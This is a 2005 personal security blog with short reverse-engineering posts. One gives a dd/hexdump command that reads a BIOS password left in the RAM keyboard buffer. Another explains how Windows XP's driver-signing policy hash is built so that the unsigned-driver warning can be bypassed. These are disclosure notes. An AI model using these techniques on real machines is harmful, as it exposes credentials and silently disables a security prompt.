Sec, blogmal!
12 2005



April '18



Thu, 29 Dec 2005

Grüße vom CCC-Congress

Ich wollte nur mal schnell vom CCC Congress reinwinken. Wie ueblich recht interessant, aber auch ein wenig Stressig. Mehr Details dann wenn ich wieder zurueck bin…

– Sec

posted at: 19:12 | Category: /misc | permanent link to this entry | 0 comments (trackback)

Tue, 20 Dec 2005

Auslesen des BIOS-Passworts

Ein gerade mal 2 Wochen altes Posting auf bugtraq diskutiert neben diversen anderen (wenig überraschenden) Erkenntnissen zum BIOS-Passwort auch eine verblüffende Tatsache. Das BIOS benutzt einen Bereich im RAM als Tastaturpuffer, den es – selbst wenn man ein Passwort eingibt – nicht löscht. Nun kommt hinzu, daß der so günstig am Anfang des physikalischen Speichers liegt, das kein traditionelles OS (Windows, Linux, *BSD) den Bereich überschreibt.

Zum Ausprobieren schaut man einfach im RAM ab 0x041e jedes zweite Byte an. Auf einem unixoiden System z.B. so:

 dd if=/dev/mem bs=512 skip=2 count=1 | hexdump -C | head

Voila, da steht es. (Und nein, mein Passwort poste ich hier jetzt nicht ;)

– Sec

posted at: 23:28 | Category: /rev-eng | permanent link to this entry | 6 comments (trackback)

Wed, 07 Dec 2005

Installing unsigned drivers in Windows

If you install a Driver on Windows XP which is not blessed by Microsoft, you get a nasty Dialog box with a warning. - Microsoft tries to tell people this is for stability reasons - See this blog entry at The Old New Thing for someone arguing for it, and read the comments for reasons why this idea only sounds good in writing.

About a year ago this had also come up on the OpenVPN mailinglist (see here). Someone in that thread pointed out, that Microsoft says you can't change it in your program which tiggered my hacker gene to see how this could be done anyways.

Liberal usage of regmon revealed that the value is indeed stored in the Policy key of HKLM\Software\Microsoft\Driver Signing, but there was also a write to the PrivateHash key of HKLM\Software\Microsoft\Windows\CurrentVersion\Setup.

With the help of apispy it was easily found out that the PrivateHash is an MD5 hash of the 4-byte-extended value of the Policy Key and some seed. The Seed is the 4-byte value of the seed key from HKLM\System\WPA\PnP).

This was quickly written down in a small proof of concept program. - And please, don't even think about ugly things like automating a mouse click to acknowledge such a dialog box again. :)

– Sec

posted at: 17:53 | Category: /rev-eng | permanent link to this entry | 4 comments (trackback)
<< older

powered by blosxom
in 0.00 s